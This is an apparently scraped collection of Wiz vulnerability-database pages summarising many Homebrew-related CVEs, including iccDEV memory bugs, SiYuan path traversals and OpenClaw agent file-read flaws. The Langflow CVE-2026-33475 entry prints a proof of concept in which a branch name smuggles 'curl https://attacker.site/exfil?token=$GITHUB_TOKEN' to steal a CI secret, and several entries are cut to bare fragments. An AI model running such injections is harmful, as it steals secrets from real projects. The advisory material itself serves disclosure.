Homebrew Severity CRITICAL No Fix Added at: Feb
Wiz
CVE-2026-21486 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-21486 [HIGH] CVE-2026-21486 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21486 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below contain Use After Free, Heap-based Buffer Overflow and Integer Overflow or Wraparound and Out-of-bounds Write vulnerabilities in its CIccSparseMatrix::CIccSparseMatrix function. This issue is fixed in version 2.3.1.2.
Source : NVD
## 7.8
Score
Published January 6, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Ad
Wiz
CVE-2026-3386 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3386 [MEDIUM] CVE-2026-3386 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3386 :
Homebrew vulnerability analysis and mitigation
A flaw has been found in wren-lang wren up to 0.4.0. Affected by this vulnerability is the function emitOp of the file src/vm/wren_compiler.c. This manipulation causes out-of-bounds read. It is possible to launch the attack on the local host. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published March 1, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wren
Wiz
CVE-2025-67488 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-67488 [HIGH] CVE-2025-67488 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67488 :
Homebrew vulnerability analysis and mitigation
SiYuan is self-hosted, open source personal knowledge management software. Versions 0.0.0-20251202123337-6ef83b42c7ce and below contain function importZipMd which is vulnerable to ZipSlips, allowing an authenticated user to overwrite files on the system. An authenticated user with access to the import functionality in notes is able to overwrite any file on the system, and can escalate to full code execution under some circumstances. A fix is planned for version 3.5.0.
Source : NVD
## 8.8
Score
Published December 9, 2025
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile
Wiz
CVE-2026-22923 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2026-22923 [HIGH] CVE-2026-22923 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22923 :
Homebrew vulnerability analysis and mitigation
A vulnerability has been identified in NX (All versions < V2512), NX (Managed Mode) (All versions < V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process that could potentially lead to arbitrary code execution.
Source : NVD
## 7.3
Score
Published February 10, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nx
Sources
NVD
Homebrew Severity HIGH Has Fix Ad
Wiz
CVE-2026-25475 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-25475 [MEDIUM] CVE-2026-25475 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25475 :
Homebrew vulnerability analysis and mitigation
OpenClaw is a personal AI assistant. Prior to version 2026.1.30, the isValidMedia() function in src/media/parse.ts allows arbitrary file paths including absolute paths, home directory paths, and directory traversal sequences. An agent can read any file on the system by outputting MEDIA:/path/to/file, exfiltrating sensitive data to the user/channel. This issue has been patched in version 2026.1.30.
Source : NVD
## 6.5
Score
Published February 4, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.8
Exploitation Pro
Wiz
CVE-2026-25503 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-25503 [HIGH] CVE-2026-25503 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25503 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, type confusion allowed malformed ICC profiles to trigger undefined behavior when loading invalid icImageEncodingType values causing denial of service. This issue has been patched in version 2.3.1.2.
Source : NVD
## 7.1
Score
Published February 3, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Home
Wiz
CVE-2026-24478 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-24478 [HIGH] CVE-2026-24478 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24478 :
Homebrew vulnerability analysis and mitigation
AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to version 1.10.0, a critical Path Traversal vulnerability in the DrupalWiki integration allows a malicious admin (or an attacker who can convince an admin to configure a malicious DrupalWiki URL) to write arbitrary files to the server. This can lead to Remote Code Execution (RCE) by overwriting configuration files or writing executable scripts. Version 1.10.0 fixes the issue.
Source : NVD
## 7.2
Score
Published January 27, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Homebrew
AnythingLLM
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV
Wiz
CVE-2026-22792 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.6
CVE-2026-22792 [CRITICAL] CVE-2026-22792 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22792 :
Homebrew vulnerability analysis and mitigation
window.bridge.mcpServersManager.createServer
Source : NVD
## 9.6
Score
Published January 21, 2026
Severity CRITICAL
CNA Score 9.6
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 63.1
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
5ire
Sources
NVD
Homebrew Severity CRITICAL Has Fix Added at: Jan 30, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Wiz
CVE-2026-33475 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-33475 [CRITICAL] CVE-2026-33475 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33475 :
Homebrew vulnerability analysis and mitigation
${{ github.head_ref }}
run:
GITHUB_TOKEN
## Details
.github/workflows/
.github/actions/
run:
run: |
validate_branch_name "${{ github.event.pull_request.head.ref }}"
Or:
run: npx playwright install ${{ inputs.browsers }} --with-deps
github.head_ref
github.event.pull_request.title
inputs.*
## PoC
Fork the Langflow repository
injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN
Open a Pull Request to the main branch from the new branch
deploy-docs-draft.yml
run:
echo "Branch: ${{ github.head_ref }}"
Will execute:
echo "Branch: injection-test"
curl https://attacker.site/exfil?token=$GITHUB_TOKEN
The attacker receives the CI secret via the exfil URL.
## Impact
Type: Shell Injecti
Wiz
CVE-2026-21676 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-21676 [HIGH] CVE-2026-21676 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21676 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have a Heap-based Buffer Overflow in its CIccMBB::Validate function which checks tag data validity. This issue is fixed in version 2.3.1.1.
Source : NVD
## 8.8
Score
Published January 6, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of
Wiz
CVE-2026-21501 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-21501 [MEDIUM] CVE-2026-21501 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21501 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to stack overflow in the calculator parser. This issue has been patched in version 2.3.1.2.
Source : NVD
## 7.8
Score
Published January 7, 2026
Severity HIGH
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 12, 2026
## Get a CVE risk assessment
Get
Wiz
CVE-2026-26326 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-26326 [MEDIUM] CVE-2026-26326 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26326 :
Homebrew vulnerability analysis and mitigation
skills.status
operator.read
configChecks
requires.config
{ path, satisfied }
Source : NVD
## 5.3
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity MEDIUM Has Fix Added at: Feb 18, 2026
Homebrew Severity MEDIUM Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's l
Wiz
CVE-2026-3385 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3385 [MEDIUM] CVE-2026-3385 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3385 :
Homebrew vulnerability analysis and mitigation
A vulnerability was detected in wren-lang wren up to 0.4.0. Affected is the function resolveLocal of the file src/vm/wren_compiler.c. The manipulation results in uncontrolled recursion. Attacking locally is a requirement. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published March 1, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wren
Sources
NVD
Homebrew Se
Wiz
CVE-2026-27808 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2026-27808 [MEDIUM] CVE-2026-27808 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27808 :
Homebrew vulnerability analysis and mitigation
Mailpit is an email testing tool and API for developers. Prior to version 1.29.2, the Link Check API (/api/v1/message/{ID}/link-check) is vulnerable to Server-Side Request Forgery (SSRF). The server performs HTTP HEAD requests to every URL found in an email without validating target hosts or filtering private/internal IP addresses. The response returns status codes and status text per link, making this a non-blind SSRF. In the default configuration (no authentication on SMTP or API), this is fully exploitable remotely with zero user interaction. This is the same class of vulnerability that was fixed in the HTML Check API (CVE-2026-23845 / GHSA-6jxm-fv7w-rw5j) and the screenshot proxy (CVE-2026-21859 / GHSA-8v65-47jx-7mfr)
Wiz
CVE-2026-27691 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.2
CVE-2026-27691 [MEDIUM] CVE-2026-27691 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27691 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. In versions up to and including 2.3.1.4, signed integer overflow in iccFromCube.cpp during multiplication triggers undefined behavior, potentially causing crashes or incorrect ICC profile generation when processing crafted/large cube inputs. Commit 43ae18dd69fc70190d3632a18a3af2f3da1e052a fixes the issue. No known workarounds are available.
Source : NVD
## 5.5
Score
Published February 25, 2026
Severity MEDIUM
CNA Score 6.2
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.5
Exploitation Probabili
Wiz
CVE-2026-30983 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-30983 [HIGH] CVE-2026-30983 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30983 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a stack buffer overflow in icFixXml() (strcpy) causing stack memory corruption or crash. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 7.8
Score
Published March 10, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in yo
Wiz
CVE-2025-66877 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-66877 [HIGH] CVE-2025-66877 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66877 :
Homebrew vulnerability analysis and mitigation
Buffer overflow vulnerability in function dcputchar in decompile.c in libming 0.4.8.
Source : NVD
## 7.5
Score
Published December 29, 2025
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
libming
Sources
NVD
Homebrew Severity HIGH No Fix Added at: Jan 19, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Compon
Wiz
CVE-2026-0771 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-0771 [HIGH] CVE-2026-0771 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0771 :
Homebrew vulnerability analysis and mitigation
Langflow PythonFunction Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Attack vectors and exploitability will vary depending on the configuration of the product.
The specific flaw exists within the handling of Python function components. Depending upon product configuration, an attacker may be able to introduce custom Python code into a workflow. An attacker can leverage this vulnerability to execute code in the context of the application. Was ZDI-CAN-27497.
Source : NVD
## 7.1
Score
Published January 23, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA
Wiz
CVE-2025-69196 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2025-69196 [HIGH] CVE-2025-69196 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69196 :
Homebrew vulnerability analysis and mitigation
FastMCP is the standard framework for building MCP applications. Prior to version 2.14.2, the server does not properly respect the resource parameter submitted by the client in the authorization and token request. Instead of issuing the token explicitly for the MCP server, the token is issued for the base_url passed to the OAuthProxy during initialization. This issue has been patched 2.14.2.
Source : NVD
## 7.4
Score
Published March 16, 2026
Severity HIGH
CNA Score 7.4
Affected Technologies
Homebrew
Model Context Protocol
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.1
Exploitation Probability (EPSS) N/A
Affecte
Wiz
CVE-2025-65715 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-65715 [HIGH] CVE-2025-65715 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-65715 :
Homebrew vulnerability analysis and mitigation
An issue in the code-runner.executorMap setting of Visual Studio Code Extensions Code Runner v0.12.2 allows attackers to execute arbitrary code when opening a crafted workspace.
Source : NVD
## 7.8
Score
Published February 16, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
coderunner
Sources
NVD
Homebrew Severity HIGH No Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's
Wiz
CVE-2025-65754 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-65754 [MEDIUM] CVE-2025-65754 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-65754 :
Homebrew vulnerability analysis and mitigation
Cross Site Scripting vulnerability in Algernon v1.17.4 allows attackers to execute arbitrary code via injecting a crafted payload into a filename.
Source : NVD
## 6.1
Score
Published December 10, 2025
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
github.com/xyproto/algernon
algernon
Sources
NVD
GoLang Severity MEDIUM Has Fix Added at: Dec 11, 2025
Homebrew Severity MEDIUM No Fix Added at: Dec 31, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—
Wiz
CVE-2026-30825 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-30825 [MEDIUM] CVE-2026-30825 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30825 :
Homebrew vulnerability analysis and mitigation
hoppscotch is an open source API development ecosystem. Prior to version 2026.2.1, the DELETE /v1/access-tokens/revoke endpoint allows any authenticated user to delete any other user's PAT by providing its ID, with no ownership verification. This issue has been patched in version 2026.2.1.
Source : NVD
## 6.5
Score
Published March 7, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
hoppscotch
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Mar 13, 2026
## Get a CVE risk
Wiz
CVE-2026-30986 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-30986 [MEDIUM] CVE-2026-30986 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30986 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap-based buffer overflow write in CIccMatrixMath::SetRange() causing memory corruption or crash. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 5.5
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritized vi
Wiz
CVE-2026-21673 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-21673 [HIGH] CVE-2026-21673 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21673 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have overflows and underflows in CIccXmlArrayType::ParseTextCountNum(). This vulnerability affects users of the iccDEV library who process ICC color profiles. This issue is fixed in version 2.3.1.1.
Source : NVD
## 7.8
Score
Published January 6, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
Wiz
CVE-2025-70039 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-70039 [CRITICAL] CVE-2025-70039 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-70039 :
Homebrew vulnerability analysis and mitigation
An issue pertaining to CWE-78: Improper Neutralization of Special Elements used in an OS Command was discovered in linagora Twake v2023.Q1.1223.
Source : NVD
## 9.8
Score
Published March 9, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
twake
Sources
NVD
Homebrew Severity CRITICAL No Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vul
Wiz
CVE-2026-23851 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-23851 [HIGH] CVE-2026-23851 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23851 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Versions prior to 3.5.4 contain a logic vulnerability in the /api/file/globalCopyFiles endpoint. The function allows authenticated users to copy files from any location on the server's filesystem into the application's workspace without proper path validation. The vulnerability exists in the api/file.go source code. The function globalCopyFiles accepts a list of source paths (srcs) from the JSON request body. While the code checks if the source file exists using filelock.IsExist(src), it fails to validate whether the source path resides within the authorized workspace directory. Version 3.5.4 patches the issue.
Source : NVD
## 8.3
Score
Published January 19, 2026
Se
Wiz
CVE-2026-32749 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.6
CVE-2026-32749 [HIGH] CVE-2026-32749 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32749 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. In versions 3.6.0 and below, POST /api/import/importSY and POST /api/import/importZipMd write uploaded archives to a path derived from the multipart filename field without sanitization, allowing an admin to write files to arbitrary locations outside the temp directory - including system paths that enable RCE. This can lead to aata destruction by overwriting workspace or application files, and for Docker containers running as root (common default), this grants full container compromise. This issue has been fixed in version 3.6.1.
Source : NVD
## 9.1
Score
Published March 19, 2026
Severity CRITICAL
CNA Score 7.6
Affected Technologies
Homebrew
Has Public Exploit Ye
Wiz
CVE-2026-21683 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-21683 [HIGH] CVE-2026-21683 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21683 :
Homebrew vulnerability analysis and mitigation
icStatusCMM::CIccEvalCompare::EvaluateProfile()
Source : NVD
## 8.8
Score
Published January 7, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Pub
Wiz
CVE-2026-30869 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-30869 [CRITICAL] CVE-2026-30869 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30869 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to 3.5.10, a path traversal vulnerability in the /export endpoint allows an attacker to read arbitrary files from the server filesystem. By exploiting double‑encoded traversal sequences, an attacker can access sensitive files such as conf/conf.json, which contains secrets including the API token, cookie signing key, and workspace access authentication code. Leaking these secrets may enable administrative access to the SiYuan kernel API, and in certain deployment scenarios could potentially be chained into remote code execution (RCE). This vulnerability is fixed in 3.5.10.
Source : NVD
## 9.8
Score
Published March 10, 2026
Severity CRITICAL
CNA Score 9.3
Affe
Wiz
CVE-2026-28435 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-28435 [HIGH] CVE-2026-28435 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28435 :
Homebrew vulnerability analysis and mitigation
cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.35.0, cpp-httplib (httplib.h) does not enforce Server::set_payload_max_length() on the decompressed request body when using HandlerWithContentReader (streaming ContentReader) with Content-Encoding: gzip (or other supported encodings). A small compressed payload can expand beyond the configured payload limit and be processed by the application, enabling a payload size limit bypass and potential denial of service (CPU/memory exhaustion). This vulnerability is fixed in 0.35.0.
Source : NVD
## 7.5
Score
Published March 4, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
H
Wiz
CVE-2026-21678 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-21678 [HIGH] CVE-2026-21678 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21678 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to heap-buffer-overflow vulnerability in IccTagXml(). This issue has been patched in version 2.3.1.2.
Source : NVD
## 7.8
Score
Published January 7, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 14, 2026
## Get a CVE risk assess
Wiz
CVE-2026-27008 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-27008 [MEDIUM] CVE-2026-27008 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27008 :
Homebrew vulnerability analysis and mitigation
download
targetDir
skills.install
Source : NVD
## 6.8
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity MEDIUM Has Fix Added at: Feb 19, 2026
Homebrew Severity MEDIUM Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
Wiz
CVE-2026-21692 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-21692 [HIGH] CVE-2026-21692 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21692 :
Homebrew vulnerability analysis and mitigation
ToXmlCurve()
IccXML/IccLibXML/IccMpeXml.cpp
Source : NVD
## 8.8
Score
Published January 7, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Publi
Wiz
CVE-2026-34389 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.9
